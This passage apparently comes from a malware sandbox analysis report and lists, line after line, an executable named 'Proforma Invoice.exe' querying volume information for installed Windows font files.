                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
